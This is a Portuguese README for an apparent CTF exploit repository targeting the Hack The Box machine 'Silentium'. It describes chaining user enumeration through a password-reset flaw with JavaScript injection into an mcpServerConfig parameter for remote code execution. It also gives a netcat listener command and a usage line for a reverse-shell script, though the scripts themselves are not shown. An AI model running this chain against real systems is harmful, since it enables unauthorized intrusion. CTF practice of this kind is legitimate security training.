
Exploração Silentium HTB-CTF
Este repositório contém a cadeia de exploração completa para a máquina Silentium no Hack The Box. O exploit utiliza uma vulnerabilidade em dois estágios envolvendo enumeração de usuários e injeção de JavaScript para alcançar Execução Remota de Código (RCE).
A cadeia de vulnerabilidades consiste em uma falha de divulgação de informações e uma injeção de código crítica. Ao enumerar primeiro os usuários válidos através de um bug de redefinição de senha, obtemos o contexto necessário para atacar o endpoint customMCP. O RCE é alcançado injetando uma função JavaScript maliciosa no parâmetro mcpServerConfig, que é executada pelo backend Node.js.
Você precisa ter Python 3 e Bash instalados, juntamente com a seguinte biblioteca:
pip install requests
Execute o script de enumeração (Bash) para encontrar contas válidas (requer users.txt):
python3 CVE-2025-58434.py
Na sua máquina local, inicie um listener Netcat:
nc -lvnp 4444
Execute o script Python fornecendo o alvo, seu IP e a chave de API obtida:
python3 CVE-2025-59528.py -t -k <CHAVE_API> -l <SEU_IP> -p 4444
| Argumento | Descrição | Obrigatório |
|---|---|---|
| -t, --target | Host alvo | Sim |
| -k, --key | Token Bearer da API | Sim |
| -l, --lhost | Seu IP do listener (VPN) | Sim |
| -p, --lport | Sua porta do listener | Sim |
Este script é destinado a fins educacionais e testes de penetração autorizados apenas em ambientes CTF. Acessar ou atacar alvos sem autorização prévia é ilegal.
Desafio: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528